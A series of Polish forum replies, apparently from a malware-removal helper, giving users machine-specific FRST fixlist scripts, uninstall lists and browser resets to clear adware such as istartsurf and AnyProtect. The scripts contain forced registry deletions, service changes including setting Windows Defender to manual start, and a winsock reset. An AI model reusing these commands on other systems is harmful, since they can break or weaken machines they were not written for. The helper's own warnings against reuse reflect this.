Prócz adware, jest tu też problem z przeinwestowaną instalacją antywirusów, działają wspólnie Avast z kombajnem Norton Internet Security. Działania wstępne: 1. Przez Panel sterowania odinstaluj: - Adware: MediaCaster by Ask, Strong Signal - Stare wersje i zbędniki: Java™ 6 Update 22, Norton Anti-Theft, Norton Internet Security, Pokki + Toshiba Start (te dwa ostatnie to jedna grupa, instalacje Pokki są wątpliwe). 2. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: HKLM\...\Run: [] => [X] HKLM-x32\...\Run: [] => [X] HKLM-x32\...\Run: [Adobe ARM] => "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe" HKLM-x32\...\Run: [switchBoard] => C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe HKLM-x32\...\Run: [AdobeCS6ServiceManager] => "C:\Program Files (x86)\Common Files\Adobe\CS6ServiceManager\CS6ServiceManager.exe" -launchedbylogin HKU\S-1-5-21-2288049013-2600891643-1799988753-1001\...\MountPoints2: {98d0edd4-ebe7-11e3-be80-089e01d65c7a} - "F:\SISetup.exe" GroupPolicy: Group Policy on Chrome detected CHR HKLM\SOFTWARE\Policies\Google: Policy restriction SearchScopes: HKU\S-1-5-21-2288049013-2600891643-1799988753-1001 -> DefaultScope {96739A43-7650-4A4A-A661-21E3DBE0B8E3} URL = SearchScopes: HKU\S-1-5-21-2288049013-2600891643-1799988753-1001 -> {96739A43-7650-4A4A-A661-21E3DBE0B8E3} URL = CHR HKLM\...\Chrome\Extension: [iikflkcanblccfahdhdonehdalibjnif] - https://clients2.google.com/service/update2/crx CHR HKLM-x32\...\Chrome\Extension: [eofcbnmajmjmplflapaojjnihcjkigck] - C:\Program Files\AVAST Software\Avast\WebRep\Chrome\aswWebRepChromeSp.crx [2015-02-27] CHR HKLM-x32\...\Chrome\Extension: [iikflkcanblccfahdhdonehdalibjnif] - https://clients2.google.com/service/update2/crx S3 SwitchBoard; "C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe" [X] S4 sptd; \SystemRoot\System32\Drivers\sptd.sys [X] C:\Program Files (x86)\AskPartnerNetwork C:\Program Files (x86)\GUM84E6.tmp C:\Program Files (x86)\Strong Signal C:\Program Files (x86)\Common Files\0780f478-67ce-4ec3-98db-39a65f4618ce C:\ProgramData\0780f478-67ce-4ec3-98db-39a65f4618ce EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Wyczyść Firefox: menu Pomoc > Informacje dla pomocy technicznej > Zresetuj / Odśwież program Firefox. Zakładki i hasła nie zostaną naruszone, ale Adblock Plus trzeba będzie przeinstalować. 4. W Google Chrome: Ustawienia > karta Rozszerzenia > odinstaluj Avast SafePrice, Norton Identity Safe, Norton Security Toolbar, Strong Signal (o ile nadal będą po w/w deinstalacjach) Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > zjedź na sam spód i uruchom opcję Zresetuj ustawienia przeglądarki. Zakładki i hasła nie zostaną naruszone. Ustawienia > karta Ustawienia > sekcja Wyszukiwanie > klik w Zarządzanie wyszukiwarkami > skasuj z listy niedomyślne śmieci (o ile będą). Zresetuj cache wtyczek. W pasku adresów wpisz chrome://plugins i ENTER. Na liście wtyczek wybierz dowolną i kliknij Wyłącz. Następnie wtyczkę ponownie Włącz. 5. Zrób nowy log FRST z opcji Scan (bez Addition i Shortcut). Dołącz też plik fixlog.txt. Wypowiedz się czy problem reklam ustąpił.

Brakuje trzeciego pliku FRST Shortcut. Istotnie, w systemie była jakaś infekcja, która wprowadziła polityki blokujące oprogramowanie antywirusowe. Przeprowadź następujące działania: 1. Przez Panel sterowania odinstaluj stare wersje i zbędniki firmowe: Acrobat.com, Adobe AIR, Adobe Flash Player 16 ActiveX, Adobe Flash Player 16 NPAPI, Adobe Reader 9.5.5 MUI, ASUS WebStorage, Google Toolbar for Internet Explorer, Java 7 Update 25 (64-bit), Java 8 Update 25. 2. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: HKLM Group Policy restriction on software: C:\Documents and Settings\All Users\Application Data\AVAST Software HKLM Group Policy restriction on software: C:\Program Files\AVAST Software HKLM Group Policy restriction on software: C:\Documents and Settings\All Users\Application Data\AVG HKLM Group Policy restriction on software: C:\Documents and Settings\All Users\Application Data\AVG HKU\S-1-5-21-2746509231-2792367075-765808972-1000\...\Run: [GoogleDriveSync] => "C:\Program Files (x86)\Google\Drive\googledrivesync.exe" /autostart (the data entry has 65 more characters). HKU\S-1-5-21-2746509231-2792367075-765808972-1000\...\RunOnce: [FlashPlayerUpdate] => C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_15_0_0_246_ActiveX.exe -update activex HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = www.google.com HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = www.google.com HKU\S-1-5-21-2746509231-2792367075-765808972-1000\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.search.ask.com/?tpid=ORJ-SPE&o=APN11406&pf=V7&trgb=IE&p2=%5EBBE%5EOSJ000%5EYY%5EPL&gct=hp&apn_ptnrs=BBE&apn_dtid=%5EOSJ000%5EYY%5EPL&apn_dbr=ie_9.0.8112.16476&apn_uid=F292F13A-4B46-426D-9DBD-5211A1E4C9C7&itbv=12.18.0.82&doi=2014-10-20&psv=&pt=tb SearchScopes: HKU\S-1-5-21-2746509231-2792367075-765808972-1000 -> DefaultScope {064A3D97-069C-4A0E-B05E-5628AE78BDD1} URL = http://www.search.ask.com/web?tpid=ORJ-SPE&o=APN11406&pf=V7&p2=^BBE^OSJ000^YY^PL&gct=&itbv=12.18.0.82&apn_uid=F292F13A-4B46-426D-9DBD-5211A1E4C9C7&apn_ptnrs=BBE&apn_dtid=^OSJ000^YY^PL&apn_dbr=ie_9.0.8112.16476&doi=2014-10-20&trgb=IE&q={searchTerms}&psv=&pt=tb SearchScopes: HKU\S-1-5-21-2746509231-2792367075-765808972-1000 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKU\S-1-5-21-2746509231-2792367075-765808972-1000 -> {064A3D97-069C-4A0E-B05E-5628AE78BDD1} URL = http://www.search.ask.com/web?tpid=ORJ-SPE&o=APN11406&pf=V7&p2=^BBE^OSJ000^YY^PL&gct=&itbv=12.18.0.82&apn_uid=F292F13A-4B46-426D-9DBD-5211A1E4C9C7&apn_ptnrs=BBE&apn_dtid=^OSJ000^YY^PL&apn_dbr=ie_9.0.8112.16476&doi=2014-10-20&trgb=IE&q={searchTerms}&psv=&pt=tb SearchScopes: HKU\S-1-5-21-2746509231-2792367075-765808972-1000 -> {67A2568C-7A0A-4EED-AECC-B5405DE63B64} URL = SearchScopes: HKU\S-1-5-21-2746509231-2792367075-765808972-1000 -> {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = Toolbar: HKLM - avast! WebRep - {318A227B-5E9F-45bd-8999-7F8F10CA4CF5} - No File Toolbar: HKU\S-1-5-21-2746509231-2792367075-765808972-1000 -> No Name - {21FA44EF-376D-4D53-9B0F-8A89D3229068} - No File CHR HomePage: Default -> hxxp://www.buenosearch.com/?babsrc=HP_ss&mntrId=4C221A4BD69141B5&affID=128166&tsp=5102 CHR HKU\S-1-5-21-2746509231-2792367075-765808972-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [apdfllckaahabafndbhieahigkjlhalf] - C:\Users\KARINA~1\AppData\Local\Google\Drive\apdfllckaahabafndbhieahigkjlhalf_live.crx [Not Found] CHR HKLM-x32\...\Chrome\Extension: [bopakagnckmlgajfccecajhnimjiiedh] - http://clients2.google.com/service/update2/crx Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\McAfee Security Scan Plus.lnk S3 McComponentHostService; C:\Program Files\McAfee Security Scan\3.8.150\McCHSvc.exe [289256 2014-04-09] (McAfee, Inc.) U3 tmlwf; No ImagePath U3 tmwfp; No ImagePath Task: {47C350A7-53BB-4A1D-92BB-4126B8407F23} - \Program aktualizacji online firmy Adobe. No Task File Task: {8BA13079-0336-403A-B9BA-D8282C2FBE8C} - \EPUpdater No Task File Task: {9ADD155F-1E7A-4BE2-9CFF-562B6F3ACDE3} - System32\Tasks\{8CD561A1-9183-4492-AD1B-D9ADEED5897A} => C:\Program Files (x86)\Gadu-Gadu 10\gg.exe Task: {CE506F2E-D591-4AE6-ADF6-E81A250281A7} - System32\Tasks\RunAsStdUser Task => C:\Program Files (x86)\ESTsoft\ALSong\ALSong.exe Task: {D0B30CA6-2917-4EE6-9EB0-753B21F7E956} - System32\Tasks\{5DA8167C-8EEF-4713-9064-C2D67B1B930E} => C:\Program Files (x86)\Gadu-Gadu 10\gg.exe Task: {D952F583-A987-4053-A4F5-644054DD8E49} - System32\Tasks\{9A9B58A7-CCBE-47E9-B12B-B6D9BC900422} => C:\Program Files (x86)\VSO\VSO Downloader\4\VsoDownloader.exe C:\ProgramData\{*}.log C:\ProgramData\F-Secure C:\ProgramData\Temp C:\Users\Karina B\AppData\Local\Google\Chrome\User Data\Default\Preferences C:\Users\Karina B\AppData\Local\Google\Chrome\User Data\Default\Extensions\khcceooakamlehbimaepcldnnlnkcmfk Reg: reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\mountpoints2 /f Reg: reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\SaveSense /f Reg: reg delete HKLM\SOFTWARE\MozillaPlugins /f Reg: reg delete HKLM\SOFTWARE\Wow6432Node\MozillaPlugins /f Reg: reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\Adobe Reader Speed Launcher" /f CMD: C:\Windows\SysWOW64\regsvr32.exe /u /s "C:\Program Files\McAfee Security Scan\3.8.150\McAfeeMSS_IE.dll" CMD: sc config "Internet Manager. RunOuc" start= disabled CMD: sc config WinDefend start= demand EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. W Google Chrome: Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > zjedź na sam spód i uruchom opcję Zresetuj ustawienia przeglądarki. Zakładki i hasła nie zostaną naruszone. Ustawienia > karta Ustawienia > sekcja Wyszukiwanie > klik w Zarządzanie wyszukiwarkami > skasuj z listy niedomyślne śmieci (o ile będą). Zresetuj cache wtyczek. W pasku adresów wpisz chrome://plugins i ENTER. Na liście wtyczek wybierz dowolną i kliknij Wyłącz. Następnie wtyczkę ponownie Włącz. 4. Zrób nowy log FRST z opcji Scan, zaznacz pola Addition i Shortcut, by powstały trzy logi. Dołącz też plik fixlog.txt.

AnyProtect nie figurował na liście zainstalowanych w Addition (inne jego składniki owszem były widoczne), dlatego nie został zadany do deinstalacji via Dodaj/Usuń. Za to w międzyczasie nabawiłeś się nowych pozycji adware (istartsurf). Deinstalacje sporo zlikwidowały, ale tu nie koniec prac. Kolejne działania: 1. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: R1 {d2c0ab1d-6370-4786-b3bc-16a62a2a98bb}Gt; G:\WINDOWS\System32\drivers\{d2c0ab1d-6370-4786-b3bc-16a62a2a98bb}Gt.sys [55824 2015-03-08] (StdLib) R1 {e4db71b5-18d7-401c-9152-e63e79440e72}Gt; G:\WINDOWS\System32\drivers\{e4db71b5-18d7-401c-9152-e63e79440e72}Gt.sys [55824 2015-03-10] (StdLib) S2 globalUpdate; G:\Program Files\globalUpdate\Update\GoogleUpdate.exe [68608 2015-03-09] (globalUpdate) [File not signed] S3 globalUpdatem; G:\Program Files\globalUpdate\Update\GoogleUpdate.exe [68608 2015-03-09] (globalUpdate) [File not signed] R1 qrnfd_1_10_0_9; system32\drivers\qrnfd_1_10_0_9.sys [X] S4 sptd; System32\Drivers\sptd.sys [X] R4 {0ade837f-26ef-4080-95b6-a675bbebbd2b}Gt; system32\drivers\{0ade837f-26ef-4080-95b6-a675bbebbd2b}Gt.sys [X] Task: G:\WINDOWS\Tasks\APSnotifierPP1.job => G:\Program Files\AnyProtectEx\AnyProtect.exe Task: G:\WINDOWS\Tasks\APSnotifierPP2.job => G:\Program Files\AnyProtectEx\AnyProtect.exe Task: G:\WINDOWS\Tasks\APSnotifierPP3.job => G:\Program Files\AnyProtectEx\AnyProtect.exe Task: G:\WINDOWS\Tasks\CCVL.job => G:\Documents and Settings\Pc\Dane aplikacji\CCVL.exe Task: G:\WINDOWS\Tasks\globalUpdateUpdateTaskMachineCore.job => G:\Program Files\globalUpdate\Update\GoogleUpdate.exe Task: G:\WINDOWS\Tasks\globalUpdateUpdateTaskMachineUA.job => G:\Program Files\globalUpdate\Update\GoogleUpdate.exe HKLM\...\Run: [upfst_pl_6.exe] => G:\Documents and Settings\Pc\Ustawienia lokalne\Dane aplikacji\fst_pl_6\upfst_pl_6.exe -runhelper HKLM\...\Run: [fst_pl_19] => [X] HKLM\...\Run: [fst_pl_6] => [X] HKLM\...\Run: [fst_pl_73] => [X] HKLM\...\Run: [fst_pl_99] => [X] HKLM\...\Run: [gmsd_pl_65] => [X] HKLM\...\Run: [upgmsd_pl_65.exe] => G:\Documents and Settings\Pc\Ustawienia lokalne\Dane aplikacji\gmsd_pl_65\upgmsd_pl_65.exe -runhelper HKU\S-1-5-21-1275210071-117609710-839522115-1003\...\Run: [bearShare] => "G:\Program Files\BearShare Applications\BearShare\BearShare.exe" --lightmode HKU\S-1-5-21-1275210071-117609710-839522115-1003\...\Run: [iSUSPM] => G:\Documents and Settings\All Users\Dane aplikacji\FLEXnet\Connect\11\ISUSPM.exe -scheduler Startup: G:\Documents and Settings\Pc\Menu Start\Programy\Autostart\superpc_soft_partner.lnk GroupPolicy: Group Policy on Chrome detected CHR HKLM\SOFTWARE\Policies\Google: Policy restriction HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.istartsurf.com/?type=hp&ts=1426430494&from=face&uid=ST500DM002-1BD142_S2AH3K6EXXXXS2AH3K6E HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.istartsurf.com/web/?type=ds&ts=1426430494&from=face&uid=ST500DM002-1BD142_S2AH3K6EXXXXS2AH3K6E&q={searchTerms} HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.istartsurf.com/?type=hp&ts=1426430494&from=face&uid=ST500DM002-1BD142_S2AH3K6EXXXXS2AH3K6E HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.istartsurf.com/web/?type=ds&ts=1426430494&from=face&uid=ST500DM002-1BD142_S2AH3K6EXXXXS2AH3K6E&q={searchTerms} HKU\S-1-5-21-1275210071-117609710-839522115-1003\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.interia.pl/#utm_source=instalki&utm_medium=installer&utm_campaign=instalki HKU\S-1-5-21-1275210071-117609710-839522115-1003\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch HKU\S-1-5-21-1275210071-117609710-839522115-1003\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.istartsurf.com/?type=hp&ts=1426430494&from=face&uid=ST500DM002-1BD142_S2AH3K6EXXXXS2AH3K6E HKLM\SOFTWARE\Microsoft\Internet Explorer\AboutURLs,Tabs: "http://www.interia.pl/#utm_source=instalki&utm_medium=installer&utm_campaign=instalki" SearchScopes: HKLM -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = http://www.istartsurf.com/web/?type=ds&ts=1426430494&from=face&uid=ST500DM002-1BD142_S2AH3K6EXXXXS2AH3K6E&q={searchTerms} SearchScopes: HKLM -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = http://www.istartsurf.com/web/?type=ds&ts=1426430494&from=face&uid=ST500DM002-1BD142_S2AH3K6EXXXXS2AH3K6E&q={searchTerms} SearchScopes: HKU\S-1-5-21-1275210071-117609710-839522115-1003 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = http://www.istartsurf.com/web/?type=ds&ts=1426430494&from=face&uid=ST500DM002-1BD142_S2AH3K6EXXXXS2AH3K6E&q={searchTerms} SearchScopes: HKU\S-1-5-21-1275210071-117609710-839522115-1003 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = http://www.istartsurf.com/web/?type=ds&ts=1426430494&from=face&uid=ST500DM002-1BD142_S2AH3K6EXXXXS2AH3K6E&q={searchTerms} StartMenuInternet: IEXPLORE.EXE - G:\Program Files\Internet Explorer\iexplore.exe http://www.mystartsearch.com/?type=sc&ts=1425850244&from=epom2&uid=ST500DM002-1BD142_S2AH3K6EXXXXS2AH3K6E FF Plugin: @staging.google.com/globalUpdate Update;version=10 -> G:\Program Files\globalUpdate\Update\1.3.25.0\npGoogleUpdate4.dll [2015-03-09] (globalUpdate) FF Plugin: @staging.google.com/globalUpdate Update;version=4 -> G:\Program Files\globalUpdate\Update\1.3.25.0\npGoogleUpdate4.dll [2015-03-09] (globalUpdate) FF HKLM\...\Firefox\Extensions: [searchengine@gmail.com] - G:\Documents and Settings\Pc\Dane aplikacji\Mozilla\Firefox\Profiles\yygpirum.default-1404846490562\extensions\searchengine@gmail.com FF HKLM\...\Firefox\Extensions: [istart_ffnt@gmail.com] - G:\Documents and Settings\Pc\Dane aplikacji\Mozilla\Firefox\Profiles\yygpirum.default-1404846490562\extensions\istart_ffnt@gmail.com G:\Documents and Settings\All Users\Dane aplikacji\{ba121210-d50e-5ae8-ba12-21210d504843} G:\Documents and Settings\All Users\Dane aplikacji\9651896652148095366 G:\Documents and Settings\All Users\Dane aplikacji\cb595a1a00006ece G:\Documents and Settings\All Users\Dane aplikacji\fmhcfkifjpdlmcallfafjkgjemhiddnf G:\Documents and Settings\All Users\Menu Start\Programy\Catalyst Control Center G:\Documents and Settings\Pc\TempWmicBatchFile.bat G:\Documents and Settings\Pc\Dane aplikacji\CCVL.exe G:\Documents and Settings\Pc\Dane aplikacji\CCVL G:\Documents and Settings\Pc\Dane aplikacji\45443439-1425850326-4639-4637-3743FFFFFFFF G:\Documents and Settings\Pc\Dane aplikacji\AnyProtectEx G:\Documents and Settings\Pc\Dane aplikacji\ASPackage G:\Documents and Settings\Pc\Dane aplikacji\istartsurf G:\Documents and Settings\Pc\Dane aplikacji\Microsoft\Internet Explorer\Quick Launch\BearShare.lnk G:\Documents and Settings\Pc\Dane aplikacji\mystartsearch G:\Documents and Settings\Pc\Dane aplikacji\systweak G:\Documents and Settings\Pc\Menu Start\Programy\BearShare.lnk G:\Documents and Settings\Pc\Ustawienia lokalne\Temp.dat G:\Documents and Settings\Pc\Ustawienia lokalne\Dane aplikacji\nsb195.tmp G:\Documents and Settings\Pc\Ustawienia lokalne\Dane aplikacji\nsg302.tmp G:\Documents and Settings\Pc\Ustawienia lokalne\Dane aplikacji\nsx2C1.tmp G:\Documents and Settings\Pc\Ustawienia lokalne\Dane aplikacji\nsy16E.tmp G:\Documents and Settings\Pc\Ustawienia lokalne\Dane aplikacji\FilesFrog Update Checker G:\Documents and Settings\Pc\Ustawienia lokalne\Dane aplikacji\globalUpdate G:\Documents and Settings\Pc\Ustawienia lokalne\Dane aplikacji\SmartWeb G:\Program Files\globalUpdate G:\Program Files\IGS G:\Program Files\predm G:\Program Files\PriuceLesss G:\WINDOWS\system32\029B560A371F4E00AB32838EBC01B9E7 G:\WINDOWS\system32\BasementDusterOff.ini G:\WINDOWS\system32\BDL.dll G:\WINDOWS\system32\roboot.exe G:\WINDOWS\system32\TempWmicBatchFile.bat G:\WINDOWS\System32\drivers\{d2c0ab1d-6370-4786-b3bc-16a62a2a98bb}Gt.sys G:\WINDOWS\System32\drivers\{e4db71b5-18d7-401c-9152-e63e79440e72}Gt.sys Reg: reg delete HKLM\SOFTWARE\Google\Update\ClientState\{4DC8B4CA-1BDA-483e-B5FA-D3C12E15B62D} /f Reg: reg delete HKLM\SOFTWARE\Google\Update\ClientState\{8A69D345-D564-463C-AFF1-A69D9E530F96} /f Reg: reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\istartsurf uninstall" /f CMD: netsh winsock reset EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. Wyczyść Firefox z adware: menu Pomoc > Informacje dla pomocy technicznej > Zresetuj / Odśwież program Firefox. Zakładki i hasła nie zostaną naruszone, ale używane rozszerzenia trzeba będzie przeinstalować. 3. Napraw uszkodzony specjalny skrót IE. W pasku eksploratora wklej poniższą ścieżkę i ENTER: G:\Documents and Settings\Pc\Menu Start\Programy\Akcesoria\Narzędzia systemowe Prawoklik na zlokalizowany tam skrót Internet explorer (bez dodatków) > Właściwości > w polu Element docelowy po ścieżce "G:\Program Files\Internet Explorer\iexplore.exe" dopisz dwie spacje i -extoff 4. Zrób nowy log FRST z opcji Scan (bez Addition i Shortcut). Dołącz też plik fixlog.txt. Wypowiedz się czy błąd startowy PowerDVD nadal występuje.

Ten błąd generuje wpis PowerDVD i nie wiadomo czy ma to cokolwiek wspólnego z infekcją: HKLM\...\Run: [PowerDVD14Agent] => G:\Program Files\CyberLink\PowerDVD14\PowerDVD14Agent.exe [795672 2014-08-12] (CyberLink Corp.). Owszem, masa obiektów adware w systemie. Dodatkowo, adware przekonwertowało przeglądarkę Google Chrome z wersji stabilnej do developerskiej i wymagana reinstalacja przeglądarki. Rozpoczniemy od deinstalacji adware, a po tym będą poprawki. Działania do przeprowadzenia: 1. Przez Dodaj/Usuń programy odinstaluj: - Adware/PUP: AnySend, App Lid, AppsHat Mobile Apps, BearShare, BetterDeals, ConvertAd, digi docket, GamesDesktop 008.65, Genieo, GoHDV09.03, HD Cinema Pro 1.8cV09.03, IGS, igsc, Improved Search, My Program version 1.5, mystartsearch uninstall, PriuceLesss, Quick Ref 1.10.0.9, Remote Desktop Access (VuuPC), SmartWeb, Super Optimizer v3.2, WinCheck - Poszkodowane Google Chrome. Przy deinstalacji zaznacz Usuń także dane przeglądarki. Nie stosuj do deinstalacji Revo. Po deinstalacjach nie instaluj na razie Google Chrome, ani żadnych innych nowych aplikacji. 2. Zrób nowy log FRST z opcji Scan, zaznacz ponownie pola Addition + Shortcut.

Obecnie portal dobreprogramy.pl nie jest bezpiecznym godnym zaufania miejscem: KLIK. Całkowicie odradzam pobieranie czegokolwiek stamtąd, nawet jeśli nie zostanie wybrany "Asystent". W raportach nie widać już czynnego "Search Protect" (to jest ochrona przekierowań istartsurf.com, by nie dało się ich usunąć), pozostały jednak powiązane foldery oraz liczne odniesienia do istartsurf.com. Akcja: 1. Odinstaluj stare niebezpieczne wersje: Adobe Flash Player 9 ActiveX, Adobe Reader 8 - Polish. 2. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.istartsurf.com/?type=hppp&ts=1426434272&from=smt&uid=WDCXWD3200BEVT-22ZCT0_WD-WXE808S5019350193 HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.istartsurf.com/web/?type=dspp&ts=1426434272&from=smt&uid=WDCXWD3200BEVT-22ZCT0_WD-WXE808S5019350193&q={searchTerms} HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.istartsurf.com/?type=hppp&ts=1426434272&from=smt&uid=WDCXWD3200BEVT-22ZCT0_WD-WXE808S5019350193 HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.istartsurf.com/web/?type=dspp&ts=1426434272&from=smt&uid=WDCXWD3200BEVT-22ZCT0_WD-WXE808S5019350193&q={searchTerms} HKU\S-1-5-21-2321440703-4263156153-367547396-1000\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.istartsurf.com/web/?type=dspp&ts=1426434272&from=smt&uid=WDCXWD3200BEVT-22ZCT0_WD-WXE808S5019350193&q={searchTerms} HKU\S-1-5-21-2321440703-4263156153-367547396-1000\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.istartsurf.com/?type=hppp&ts=1426434272&from=smt&uid=WDCXWD3200BEVT-22ZCT0_WD-WXE808S5019350193 HKU\S-1-5-21-2321440703-4263156153-367547396-1000\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.istartsurf.com/?type=hppp&ts=1426434272&from=smt&uid=WDCXWD3200BEVT-22ZCT0_WD-WXE808S5019350193 HKU\S-1-5-21-2321440703-4263156153-367547396-1000\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.istartsurf.com/web/?type=dspp&ts=1426434272&from=smt&uid=WDCXWD3200BEVT-22ZCT0_WD-WXE808S5019350193&q={searchTerms} SearchScopes: HKLM -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = http://www.istartsurf.com/web/?type=dspp&ts=1426434272&from=smt&uid=WDCXWD3200BEVT-22ZCT0_WD-WXE808S5019350193&q={searchTerms} SearchScopes: HKLM -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = http://www.istartsurf.com/web/?type=dspp&ts=1426434272&from=smt&uid=WDCXWD3200BEVT-22ZCT0_WD-WXE808S5019350193&q={searchTerms} SearchScopes: HKU\S-1-5-21-2321440703-4263156153-367547396-1000 -> DefaultScope {2023ECEC-E06A-4372-A1C7-0B49F9E0FFF0} URL = http://www.istartsurf.com/web/?utm_source=b&utm_medium=smt&utm_campaign=install_ie&utm_content=ds&from=smt&uid=WDCXWD3200BEVT-22ZCT0_WD-WXE808S5019350193&ts=1426434299&type=default&q={searchTerms} SearchScopes: HKU\S-1-5-21-2321440703-4263156153-367547396-1000 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = http://www.istartsurf.com/web/?utm_source=b&utm_medium=smt&utm_campaign=install_ie&utm_content=ds&from=smt&uid=WDCXWD3200BEVT-22ZCT0_WD-WXE808S5019350193&ts=1426434299&type=default&q={searchTerms} SearchScopes: HKU\S-1-5-21-2321440703-4263156153-367547396-1000 -> {2023ECEC-E06A-4372-A1C7-0B49F9E0FFF0} URL = http://www.istartsurf.com/web/?utm_source=b&utm_medium=smt&utm_campaign=install_ie&utm_content=ds&from=smt&uid=WDCXWD3200BEVT-22ZCT0_WD-WXE808S5019350193&ts=1426434299&type=default&q={searchTerms} SearchScopes: HKU\S-1-5-21-2321440703-4263156153-367547396-1000 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = http://www.istartsurf.com/web/?utm_source=b&utm_medium=smt&utm_campaign=install_ie&utm_content=ds&from=smt&uid=WDCXWD3200BEVT-22ZCT0_WD-WXE808S5019350193&ts=1426434299&type=default&q={searchTerms} SearchScopes: HKU\S-1-5-21-2321440703-4263156153-367547396-1000 -> {E733165D-CBCF-4FDA-883E-ADEF965B476C} URL = http://www.istartsurf.com/web/?utm_source=b&utm_medium=smt&utm_campaign=install_ie&utm_content=ds&from=smt&uid=WDCXWD3200BEVT-22ZCT0_WD-WXE808S5019350193&ts=1426434299&type=default&q={searchTerms} StartMenuInternet: IEXPLORE.EXE - C:\Program Files\Internet Explorer\iexplore.exe http://www.istartsurf.com/?type=sc&ts=1426434200&from=smt&uid=WDCXWD3200BEVT-22ZCT0_WD-WXE808S5019350193 FF HKLM\...\Firefox\Extensions: [{20a82645-c095-46ed-80e3-08825760534b}] - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension FF SearchPlugin: C:\Program Files\mozilla firefox\browser\searchplugins\istartsurf.xml [2015-03-16] C:\Program Files\XTab C:\ProgramData\IHProtectUpDate C:\Users\Mężczyzna\Downloads\*(*)-dp*.exe C:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Wyczyść Firefox: menu Pomoc > Informacje dla pomocy technicznej > Zresetuj / Odśwież program Firefox. Zakładki i hasła nie zostaną naruszone, ale używane rozszerzenia (Perapera Chinese i YouTube mp3) należy przeinstalować. 4. Napraw uszkodzony specjalny skrót IE. W pasku eksploratora wklej poniższą ścieżkę i ENTER: C:\Users\Mężczyzna\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools Prawoklik na zlokalizowany tam skrót Internet explorer (bez dodatków) > Właściwości > w polu Element docelowy po ścieżce "C:\Program Files\Internet Explorer\iexplore.exe" dopisz dwie spacje i -extoff 5. Zrób nowy log FRST z opcji Scan (bez Addition i Shortcut). Dołącz też plik fixlog.txt.

